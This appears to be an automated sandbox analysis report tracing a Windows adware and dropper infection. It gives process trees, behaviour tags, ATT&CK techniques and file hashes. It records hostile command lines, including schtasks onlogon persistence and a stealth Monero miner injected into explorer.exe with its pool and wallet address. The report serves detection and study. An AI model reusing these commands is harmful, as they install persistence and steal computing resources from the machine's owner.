C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631197⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942317⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf6ff46f8,0x7ffdf6ff4708,0x7ffdf6ff47188⤵
-
C:\Users\Admin\AppData\Local\Temp\d6-db5fe-475-7f199-6af392b37c44c\Rivorojihe.exe"C:\Users\Admin\AppData\Local\Temp\d6-db5fe-475-7f199-6af392b37c44c\Rivorojihe.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwxxwqrp.4w4\GcleanerEU.exe /eufive & exit7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe /qn CAMPAIGN="654" & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exeC:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe /qn CAMPAIGN="654"8⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sk55si5j.lm0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 /qn CAMPAIGN=""654"" " CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbmjfapt.opc\ufgaa.exe & exit7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exeC:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ye2wi2nn.mhj\anyname.exe" -q9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssjutxx0.cdi\gcleaner.exe /mixfive & exit7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 17724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3924183.exe"C:\Users\Admin\AppData\Roaming\3924183.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5368 -s 23005⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\1473080.exe"C:\Users\Admin\AppData\Roaming\1473080.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\4317104.exe"C:\Users\Admin\AppData\Roaming\4317104.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6297292.exe"C:\Users\Admin\AppData\Roaming\6297292.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 20845⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 656 -ip 6561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4456 -ip 44561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2812 -ip 28121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1192 -ip 11921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1608 -ip 16081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 840 -ip 8401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1016 -ip 10161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4276 -ip 42761⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4716 -ip 47161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4244 -ip 42441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1072 -ip 10721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DAACCB6D3EF0EBC64C377E07E5874EAF C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7F4266BEBFD6A78D7859BD4270EA87752⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0564138F09373E09A94EC1F1D5D4C86A C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffe00cbdec0,0x7ffe00cbded0,0x7ffe00cbdee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2100 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=1660 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1488 /prefetch:25⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2672 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2664 /prefetch:15⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2836 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2992 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2820 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2764 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2184 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,5309059434151910905,9214066049149810648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3268_866830339" --mojo-platform-channel-handle=2772 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_ECF2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5744 -ip 57441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 5368 -ip 53681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3932 -ip 39321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6028 -ip 60281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6740 -ip 67401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6740 -ip 67401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6748 -ip 67481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\customer3.exeMD5
1daac0c9a48a79976539b0722f9c3d3b
SHA1843218f70a6a7fd676121e447b5b74acb0d87100
SHA256e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf
SHA5122259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exeMD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeMD5
3c7117f96c0c2879798a78a32d5d34cc
SHA1197c7dea513f8cbb7ebc17610f247d774c234213
SHA2566e17c993f42fcc005867e0fd33f98cae32726571d18f6dd8b9b06cefb82de162
SHA512b89573ac6cbbe132c0c4bac009904cba6d5fda9b4d4eebe2d9552f2451acdd8b7b8e8dce663b26f6541c9c124eb5b9f468efd23b35a28047b0cb942f3a90c122
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27MD5
7a1fb9090a24734d56954ecc87715134
SHA16f2efb24e1d0e5ace68dffdfe1f647066695387b
SHA256a4abd30e80cf96ac4fff50a4d837f7f47e62c7597909b44fc6d154db8c55649c
SHA51282dc9084b3af19d37a2095c8400e1e850572efa003f043620d779372417df3a6875ec10518d9e72dc317687d8c42417fdf09b86c56b2b6f01f7a0b164960b37f
-
